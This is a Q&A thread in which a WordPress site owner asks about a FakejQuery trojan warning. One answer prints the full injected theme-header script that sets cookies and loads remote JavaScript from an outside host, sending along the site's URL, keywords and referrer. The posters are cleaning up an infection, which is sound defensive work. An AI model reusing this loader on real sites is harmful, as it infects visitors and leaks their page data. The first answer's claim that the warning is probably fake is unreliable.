# Threat found on my wordpress website

Tags: wordpress

Ever since i connected my website to the domain i started to get on some computers that are trying to visit the website this warring:

Access to the web page was blocked.  Show URL

Threat: JS/TrojanDownloader.FakejQuery.B trojan

[image]

what should i do?

Comment: Show [here](https://blog.avast.com/wordpress-and-joomla-users-get-hacked-be-aware-of-fake-jquery) and [here](https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html). Maybe it helps.

Comment: what host are you using?

Comment: I will contact the host and will read it, will update with an answer

Answer (score 0):

If you're going through a host for your domain, I would contact them for an explanation. In the mean time/if you are hosting it yourself, I would try and run the Shodan extension for chrome on the site to check for other active ports that could be influencing the connecting clients. Double check all of your javascript files for something that could be fishy.

This honestly looks fake in my experience. It looks more like something a ransomware would use instead of an actual trojan. If you dont have ANY javascript on your website, then I would almost guarantee that it's not real.

Answer (score 0):

I've just come across this post as I have a client whose website was attacked by this virus. The site was not one of mine I would add, and running Wordpress 3.6 (quite old now).

I went through the theme files, and found this added to the header:

```
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://sweetsalesgirl.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
```

I found by removing this from the header of the theme the warning for the trojan went away.

Worth removing.